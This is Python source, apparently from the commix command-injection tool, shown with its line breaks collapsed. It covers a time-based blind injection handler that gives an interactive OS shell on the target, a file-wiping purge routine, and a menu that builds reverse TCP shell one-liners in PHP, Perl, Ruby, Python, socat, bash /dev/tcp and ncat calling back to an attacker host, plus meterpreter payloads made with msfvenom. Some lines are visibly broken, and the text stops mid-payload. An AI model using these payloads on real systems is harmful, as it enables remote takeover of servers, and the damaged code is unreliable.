def sys_argv_errors(): _reload_module(sys) try: # Fix for Python 2.7 sys.setdefaultencoding('utf8') except AttributeError: pass for i in xrange(len(sys.argv)): # Check for illegal (non-console) quote characters. if len(sys.argv[i]) > 1 and all( ord(_) in xrange(0x2018, 0x2020) for _ in ((sys.argv[i].split('=', 1)[-1].strip() or ' ')[0], sys.argv[i][-1])): err_msg = "Illegal (non-console) quote characters ('" + sys.argv[ i] + "')." print(print_critical_msg(err_msg)) raise SystemExit() # Check for illegal (non-console) comma characters. elif len(sys.argv[i]) > 1 and u"\uff0c" in sys.argv[i].split('=', 1)[-1]: err_msg = "Illegal (non-console) comma character ('" + sys.argv[ i] + "')." print(print_critical_msg(err_msg)) raise SystemExit() # Check for potentially miswritten (illegal '=') short option. elif"\A-\w=.+", sys.argv[i]): err_msg = "Potentially miswritten (illegal '=') short option detected ('" + sys.argv[ i] + "')." print(print_critical_msg(err_msg)) raise SystemExit()
def sys_argv_checks(): tamper_index = None for i in xrange(len(sys.argv)): # Disable coloring if sys.argv[i] == "--disable-coloring": from src.utils import colors colors.ENABLE_COLORING = False """ Dirty hack from sqlmap [1], regarding merging of tamper script arguments (e.g. --tamper A --tamper B -> --tamper=A,B) [1] """ if sys.argv[i].startswith("--tamper"): if tamper_index is None: tamper_index = i if '=' in sys.argv[i] else (i + 1 if i + 1 < len(sys.argv) and not sys.argv[i + 1].startswith('-') else None) else: sys.argv[tamper_index] = "%s,%s" % (sys.argv[tamper_index], sys.argv[i].split('=')[1] if '=' in sys.argv[i] else (sys.argv[i + 1] if i + 1 < len(sys.argv) and not sys.argv[i + 1].startswith('-') else "")) sys.argv[i] = ""
def tfb_injection_handler(url, timesec, filename, tmp_path, http_request_method, url_time_response): counter = 1 num_of_chars = 1 vp_flag = True no_result = True is_encoded = False possibly_vulnerable = False false_positive_warning = False export_injection_info = False how_long = 0 injection_type = "semi-blind command injection" technique = "tempfile-based injection technique" if settings.TIME_RELATIVE_ATTACK == False: warn_msg = "It is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions." print(settings.print_warning_msg(warn_msg) + Style.RESET_ALL) settings.TIME_RELATIVE_ATTACK = None # Check if defined "--maxlen" option. if menu.options.maxlen: maxlen = settings.MAXLEN # Check if defined "--url-reload" option. if menu.options.url_reload == True: err_msg = "The '--url-reload' option is not available in " + technique + "!" print(settings.print_critical_msg(err_msg)) if not settings.LOAD_SESSION: # Change TAG on every request to prevent false-positive resutls. TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6)) if settings.VERBOSITY_LEVEL != 0: info_msg ="Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + ". " print(settings.print_info_msg(info_msg)) #whitespace = checks.check_whitespaces() # Calculate all possible combinations total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) for whitespace in settings.WHITESPACES: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False # If a previous session is available. how_long_statistic = [] if settings.LOAD_SESSION: try: settings.TEMPFILE_BASED_STATE = True cmd = shell = "" url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method) checks.check_for_stored_tamper(payload) settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - timesec OUTPUT_TEXTFILE = tmp_path + TAG + ".txt" except TypeError: err_msg = "An error occurred while accessing session file ('" err_msg += settings.SESSION_FILE + "'). " err_msg += "Use the '--flush-session' option." print(settings.print_critical_msg(err_msg)) raise SystemExit() else: num_of_chars = num_of_chars + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # The output file for file-based injection technique. OUTPUT_TEXTFILE = tmp_path + TAG + ".txt" alter_shell = menu.options.alter_shell tag_length = len(TAG) + 4 for output_length in range(1, int(tag_length)): try: # Tempfile-based decision payload (check if host is vulnerable). if alter_shell : payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, timesec, http_request_method) else: payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, timesec, http_request_method) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(settings.SINGLE_WHITESPACE, whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: payload_msg = payload.replace("\n", "\\n") print(settings.print_payload(payload_msg)) elif settings.VERBOSITY_LEVEL >= 2: debug_msg = "Generating payload for the injection." print(settings.print_debug_msg(debug_msg)) print(settings.print_payload(payload)) # Cookie header injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie header injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent HTTP header injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent HTTP header injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer HTTP header injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer HTTP header injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload) # Host HTTP header injection elif settings.HOST_INJECTION == True: # Check if target host is vulnerable to host HTTP header injection. vuln_parameter = parameters.specify_host_parameter( how_long = tfb_injector.host_injection_test(url, vuln_parameter, payload) # Custom HTTP header injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom HTTP header injection. vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG) how_long = tfb_injector.custom_header_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url) # Statistical analysis in time responses. how_long_statistic.append(how_long) # Injection percentage calculation percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2)) if percent == 100 and no_result == True: if settings.VERBOSITY_LEVEL == 0: percent = settings.FAIL_STATUS else: percent = "" else: if (url_time_response == 0 and (how_long - timesec) >= 0) or \ (url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \ (url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) : # Time relative false positive fixation. false_positive_fixation = False if len(TAG) == output_length: # Simple statical analysis statistical_anomaly = True if len(set(how_long_statistic[0:5])) == 1: if max(xrange(len(how_long_statistic)), key=lambda x: how_long_statistic[x]) == len(TAG) - 1: statistical_anomaly = False how_long_statistic = [] if timesec <= how_long and not statistical_anomaly: false_positive_fixation = True else: false_positive_warning = True # Identified false positive warning message. if false_positive_warning: warn_msg = "Unexpected time delays have been identified due to unstable " warn_msg += "requests. This behavior may lead to false-positive results.\n" sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) while True: if not menu.options.batch: question_msg = "How do you want to proceed? [(C)ontinue/(s)kip/(q)uit] > " proceed_option = _input(settings.print_question_msg(question_msg)) else: proceed_option = "" if len(proceed_option) == 0: proceed_option = "c" if proceed_option.lower() in settings.CHOICE_PROCEED : if proceed_option.lower() == "s": false_positive_fixation = False raise elif proceed_option.lower() == "c": timesec = timesec + 1 false_positive_fixation = True break elif proceed_option.lower() == "q": raise SystemExit() else: err_msg = "'" + proceed_option + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass if settings.VERBOSITY_LEVEL == 0: percent = ".. (" + str(float_percent) + "%)" info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "." + "" + percent + "" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() # Check if false positive fixation is True. if false_positive_fixation: false_positive_fixation = False settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - timesec if false_positive_warning: time.sleep(1) randv1 = random.randrange(0, 4) randv2 = random.randrange(1, 5) randvcalc = randv1 + randv2 if settings.TARGET_OS == "win": if alter_shell: cmd = settings.WIN_PYTHON_INTERPRETER + " -c \"print (" + str(randv1) + " + " + str(randv2) + ")\"" else: cmd = "powershell.exe -InputFormat none write (" + str(randv1) + " + " + str(randv2) + ")" else: cmd = "echo $((" + str(randv1) + " %2B " + str(randv2) + "))" # Set the original delay time original_how_long = how_long # Check for false positive resutls how_long, output = tfb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell, how_long, url_time_response) if (url_time_response == 0 and (how_long - timesec) >= 0) or \ (url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \ (url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) : if str(output) == str(randvcalc) and len(TAG) == output_length: possibly_vulnerable = True how_long_statistic = 0 if settings.VERBOSITY_LEVEL == 0: percent = settings.info_msg else: percent = "" #break else: break # False positive else: if settings.VERBOSITY_LEVEL == 0: percent = ".. (" + str(float_percent) + "%)" info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "." + "" + percent + "" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() continue else: if settings.VERBOSITY_LEVEL == 0: percent = ".. (" + str(float_percent) + "%)" info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "." + "" + percent + "" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() continue if settings.VERBOSITY_LEVEL == 0: info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "." + "" + percent + "" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() except KeyboardInterrupt: if settings.VERBOSITY_LEVEL != 0: print(settings.SINGLE_WHITESPACE) if 'cmd' in locals(): # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: if 'cmd' in locals(): # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except EOFError: err_msg = "Exiting, due to EOFError." print(settings.print_error_msg(err_msg)) if 'cmd' in locals(): # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except: percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2)) if str(float_percent) == "100.0": if no_result == True: if settings.VERBOSITY_LEVEL == 0: percent = settings.FAIL_STATUS info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "." + "" + percent + "" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() else: percent = "" else: percent = ".. (" + str(float_percent) + "%)" print(settings.SINGLE_WHITESPACE) # Print logs notification message logs.logs_notification(filename) #raise else: percent = ".. (" + str(float_percent) + "%)" break # Yaw, got shellz! # Do some magic tricks! if (url_time_response == 0 and (how_long - timesec) >= 0) or \ (url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \ (url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) : if (len(TAG) == output_length) and \ (possibly_vulnerable == True or settings.LOAD_SESSION and int(is_vulnerable) == menu.options.level): found = True no_result = False # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True if settings.LOAD_SESSION: if whitespace == "%20": whitespace = " " possibly_vulnerable = False if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.HOST_INJECTION == True: header_name = " Host" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method != settings.HTTPMETHOD.POST: found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.LOAD_SESSION: if settings.VERBOSITY_LEVEL == 0: print(settings.SINGLE_WHITESPACE) else: checks.total_of_requests() # Print the findings to terminal. info_msg = "The" if len(found_vuln_parameter) > 0 and not "cookie" in header_name : info_msg += " " + http_request_method info_msg += ('', ' (JSON)')[settings.IS_JSON] + ('', ' (SOAP/XML)')[settings.IS_XML] + the_type + header_name info_msg += found_vuln_parameter + " seems injectable via " info_msg += "(" + injection_type.split(" ")[0] + ") " + technique + "." print(settings.print_bold_info_msg(info_msg)) sub_content = str(checks.url_decode(payload)) print(settings.print_sub_content(sub_content)) # Export session if not settings.LOAD_SESSION: shell = "" session_handler.injection_point_importation(url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, original_how_long, output_length, is_vulnerable=menu.options.level) #possibly_vulnerable = False else: settings.LOAD_SESSION = False # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) if settings.TARGET_OS == "win": time.sleep(1) new_line = False # Check for any enumeration options. if settings.ENUMERATION_DONE == True : while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " enumerate_again = _input("\n" + settings.print_question_msg(question_msg)).lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "Y" if enumerate_again in settings.CHOICE_YES: tfb_enumeration.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) print(settings.SINGLE_WHITESPACE) break elif enumerate_again in settings.CHOICE_NO: new_line = True break elif enumerate_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: if menu.enumeration_options(): tfb_enumeration.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) print(settings.SINGLE_WHITESPACE) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : print(settings.SINGLE_WHITESPACE) while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " file_access_again = _input(settings.print_question_msg(question_msg)) else: file_access_again = "" if len(file_access_again) == 0: file_access_again = "Y" if file_access_again in settings.CHOICE_YES: tfb_file_access.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) break elif file_access_again in settings.CHOICE_NO: if not new_line: new_line = True break elif file_access_again in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise SystemExit() else: err_msg = "'" + file_access_again + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass else: # if not menu.enumeration_options() and not menu.options.os_cmd: # print(settings.SINGLE_WHITESPACE) tfb_file_access.do_check(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Check if defined single cmd. if menu.options.os_cmd: check_how_long, output = tfb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Export injection result tfb_injector.export_injection_results(cmd, separator, output, check_how_long) # Delete previous shell (text) files (output) from temp. if settings.VERBOSITY_LEVEL != 0: print(settings.SINGLE_WHITESPACE) delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) logs.print_logs_notification(filename, url) raise SystemExit() if settings.VERBOSITY_LEVEL != 0 or not new_line: print(settings.SINGLE_WHITESPACE) try: # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " gotshell = _input(settings.print_question_msg(question_msg)) else: gotshell = "" if len(gotshell) == 0: gotshell = "Y" if gotshell in settings.CHOICE_YES: # if not menu.options.batch: # print(settings.SINGLE_WHITESPACE) print("Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)") if settings.READLINE_ERROR: checks.no_readline_module() while True: if false_positive_warning: warn_msg = "Due to unexpected time delays, it is highly " warn_msg += "recommended to enable the 'reverse_tcp' option.\n" sys.stdout.write("\r" + settings.print_warning_msg(warn_msg)) false_positive_warning = False if not settings.READLINE_ERROR: checks.tab_autocompleter() cmd = _input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: go_back, go_back_again = shell_options.check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE="") if go_back and go_back_again == False: break if go_back and go_back_again: return True if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # The main command injection exploitation. check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename, url_time_response) # Export injection result tfb_injector.export_injection_results(cmd, separator, output, check_how_long) if not menu.options.ignore_session : session_handler.store_cmd(url, cmd, output, vuln_parameter) else: output = session_handler.export_stored_cmd(url, cmd, vuln_parameter) # Update logs with executed cmds and execution results. logs.executed_command(filename, cmd, output) print("\n" + settings.print_output(output) + "\n") # Update logs with executed cmds and execution results. logs.executed_command(filename, cmd, output) elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) return True elif gotshell in settings.CHOICE_QUIT: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise SystemExit() else: err_msg = "'" + gotshell + "' is not a valid answer." print(settings.print_error_msg(err_msg)) pass except KeyboardInterrupt: if settings.VERBOSITY_LEVEL != 0: print(settings.SINGLE_WHITESPACE) # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except SystemExit: # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except EOFError: err_msg = "Exiting, due to EOFError." print(settings.print_error_msg(err_msg)) # Delete previous shell (text) files (output) from temp. delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise if no_result == True: if settings.VERBOSITY_LEVEL == 0: print(settings.SINGLE_WHITESPACE) return False else : sys.stdout.write("\r") sys.stdout.flush()
def purge(): directory = settings.OUTPUT_DIR if not os.path.isdir(directory): warn_msg = "Skipping purging of directory '" + directory + "' as it does not exist." print(settings.print_warning_msg(warn_msg)) return info_msg = "Purging content of directory '" + directory + "'" if not menu.options.verbose >= 1: info_msg += ". " else: info_msg += ".\n" sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() # Purging content of target directory. dir_paths = [] file_paths = [] for rootpath, directories, filenames in os.walk(directory): dir_paths.extend([os.path.abspath(os.path.join(rootpath, i)) for i in directories]) file_paths.extend([os.path.abspath(os.path.join(rootpath, i)) for i in filenames]) # Changing file attributes. if menu.options.verbose >= 1: info_msg = "Changing file attributes. " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() failed = False for file_path in file_paths: try: os.chmod(file_path, stat.S_IREAD | stat.S_IWRITE) except: failed = True pass if menu.options.verbose >= 1: if not failed: print(settings.SUCCESS_STATUS) else: print(settings.FAIL_STATUS) # Writing random data to files. if menu.options.verbose >= 1: info_msg = "Writing random data to files. " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() failed = False for file_path in file_paths: try: filesize = os.path.getsize(file_path) with open(file_path, "w+b") as f: f.write("".join(chr(random.randint(0, 255)) for _ in xrange(filesize))) except: failed = True pass if menu.options.verbose >= 1: if not failed: print(settings.SUCCESS_STATUS) else: print(settings.FAIL_STATUS) # Truncating files. if menu.options.verbose >= 1: info_msg = "Truncating files. " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() failed = False for file_path in file_paths: try: with open(file_path, 'w') as f: pass except: failed = True pass if menu.options.verbose >= 1: if not failed: print(settings.SUCCESS_STATUS) else: print(settings.FAIL_STATUS) # Renaming filenames to random values. if menu.options.verbose >= 1: info_msg = "Renaming filenames to random values. " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() failed = False for file_path in file_paths: try: os.rename(file_path, os.path.join(os.path.dirname(file_path), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) except: failed = True pass if menu.options.verbose >= 1: if not failed: print(settings.SUCCESS_STATUS) else: print(settings.FAIL_STATUS) # Renaming directory names to random values. if menu.options.verbose >= 1: info_msg = "Renaming directory names to random values. " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() failed = False dir_paths.sort(key=functools.cmp_to_key(lambda x, y: y.count(os.path.sep) - x.count(os.path.sep))) for dir_path in dir_paths: try: os.rename(dir_path, os.path.join(os.path.dirname(dir_path), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) except: failed = True pass if menu.options.verbose >= 1: if not failed: print(settings.SUCCESS_STATUS) else: print(settings.FAIL_STATUS) # Deleting the whole directory tree. if menu.options.verbose >= 1: info_msg = "Deleting the whole directory tree. " sys.stdout.write(settings.print_info_msg(info_msg)) try: failed = False os.chdir(os.path.join(directory, "..")) shutil.rmtree(directory) except OSError as ex: failed = True if not failed: print(settings.SUCCESS_STATUS) else: print(settings.FAIL_STATUS) err_msg = "Problem occurred while removing directory '" + directory + "'." print(settings.print_critical_msg(err_msg)) # eof
def other_reverse_shells(separator): while True: other_shell = _input(""" ---[ """ + Style.BRIGHT + Fore.BLUE + """Unix-like reverse TCP shells""" + Style.RESET_ALL + """ ]--- Type '""" + Style.BRIGHT + """1""" + Style.RESET_ALL + """' to use a PHP reverse TCP shell. Type '""" + Style.BRIGHT + """2""" + Style.RESET_ALL + """' to use a Perl reverse TCP shell. Type '""" + Style.BRIGHT + """3""" + Style.RESET_ALL + """' to use a Ruby reverse TCP shell. Type '""" + Style.BRIGHT + """4""" + Style.RESET_ALL + """' to use a Python reverse TCP shell. Type '""" + Style.BRIGHT + """5""" + Style.RESET_ALL + """' to use a Socat reverse TCP shell. Type '""" + Style.BRIGHT + """6""" + Style.RESET_ALL + """' to use a Bash reverse TCP shell. Type '""" + Style.BRIGHT + """7""" + Style.RESET_ALL + """' to use a Ncat reverse TCP shell. \n---[ """ + Style.BRIGHT + Fore.BLUE + """Windows reverse TCP shells""" + Style.RESET_ALL + """ ]--- Type '""" + Style.BRIGHT + """8""" + Style.RESET_ALL + """' to use a PHP meterpreter reverse TCP shell. Type '""" + Style.BRIGHT + """9""" + Style.RESET_ALL + """' to use a Python reverse TCP shell. Type '""" + Style.BRIGHT + """10""" + Style.RESET_ALL + """' to use a Python meterpreter reverse TCP shell. Type '""" + Style.BRIGHT + """11""" + Style.RESET_ALL + """' to use a Windows meterpreter reverse TCP shell. Type '""" + Style.BRIGHT + """12""" + Style.RESET_ALL + """' to use the web delivery script. \ncommix(""" + Style.BRIGHT + Fore.RED + """reverse_tcp_other""" + Style.RESET_ALL + """) > """) # PHP-reverse-shell if other_shell == '1': other_shell = "php -r '$sock=fsockopen(\"" + settings.LHOST + "\"," + settings.LPORT + ");" \ "exec(\"/bin/sh -i <%263 >%263 2>%263\");'" break # Perl-reverse-shell elif other_shell == '2': other_shell = "perl -e 'use Socket;" \ "$i=\"" + settings.LHOST + "\";" \ "$p=" + settings.LPORT + ";" \ "socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));" \ "if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">%26S\");" \ "open(STDOUT,\">%26S\");open(STDERR,\">%26S\");" \ "exec(\"/bin/sh -i\");};'" break # Ruby-reverse-shell elif other_shell == '3': other_shell = "ruby -rsocket -e '" \ "\"" + settings.LHOST + "\"," + settings.LPORT + ");" \ "$stdin.reopen(c);" \ "$stdout.reopen(c);" \ "$stderr.reopen(c);" \ "$stdin.each_line{|l|l=l.strip;" \ "next if l.length==0;" \ "(IO.popen(l,\"rb\"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }'" break # Python-reverse-shell elif other_shell == '4': other_shell = "python -c 'import socket,subprocess,os%0d" \ "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)%0d" \ "s.connect((\"" + settings.LHOST + "\"," + settings.LPORT + "))%0d" \ "os.dup2(s.fileno(),0)%0d" \ "os.dup2(s.fileno(),1)%0d" \ "os.dup2(s.fileno(),2)%0d" \ "[\"/bin/sh\",\"-i\"])%0d'" break # Socat-reverse-shell elif other_shell == '5': other_shell = "socat tcp-connect:" + settings.LHOST + ":" + settings.LPORT + \ " exec:\"sh\",pty,stderr,setsid,sigint,sane" break # Bash-reverse-shell elif other_shell == '6': tmp_file = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(5) ]) other_shell = "echo \"/bin/sh 0>/dev/tcp/"+ settings.LHOST + "/" + settings.LPORT + \ " 1>%260 2>%260\" > /tmp/" + tmp_file + " " + separator + " /bin/bash /tmp/" + tmp_file break # Ncat-reverse-shell elif other_shell == '7': other_shell = "ncat " + settings.LHOST + " " + settings.LPORT + " -e /bin/sh" break # PHP-reverse-shell (meterpreter) elif other_shell == '8': if not os.path.exists(settings.METASPLOIT_PATH): error_msg = settings.METASPLOIT_ERROR_MSG print(settings.print_error_msg(error_msg)) continue payload = "php/meterpreter/reverse_tcp" output = "php_meterpreter.rc" info_msg = "Generating the '" + payload + "' payload. " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: proc = subprocess.Popen( "msfvenom -p " + str(payload) + " LHOST=" + str(settings.LHOST) + " LPORT=" + str(settings.LPORT) + " -e php/base64 -o " + output + ">/dev/null 2>&1", shell=True).wait() with open(output, "r+") as content_file: data = content_file.readlines() data = ''.join(data).replace("\n", " ") print(settings.SUCCESS_STATUS) # Remove the ouput file. os.remove(output) with open(output, 'w+') as filewrite: filewrite.write("use exploit/multi/handler\n" "set payload " + payload + "\n" "set lhost " + str(settings.LHOST) + "\n" "set lport " + str(settings.LPORT) + "\n" "exploit\n\n") if settings.TARGET_OS == "win" and not settings.USER_DEFINED_PHP_DIR: set_php_working_dir() other_shell = settings.WIN_PHP_DIR + " -r " + data else: other_shell = "php -r \"" + data + "\"" msf_launch_msg(output) except: print(settings.FAIL_STATUS) break # Python-reverse-shell elif other_shell == '9': data = " -c \"(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('" + settings.LHOST + "', " + settings.LPORT + ")), " \ "[[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), " \ " __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), " \ " {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: " \ " __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: " \ " after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, " \ " __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] " \ "for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] " \ "for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, 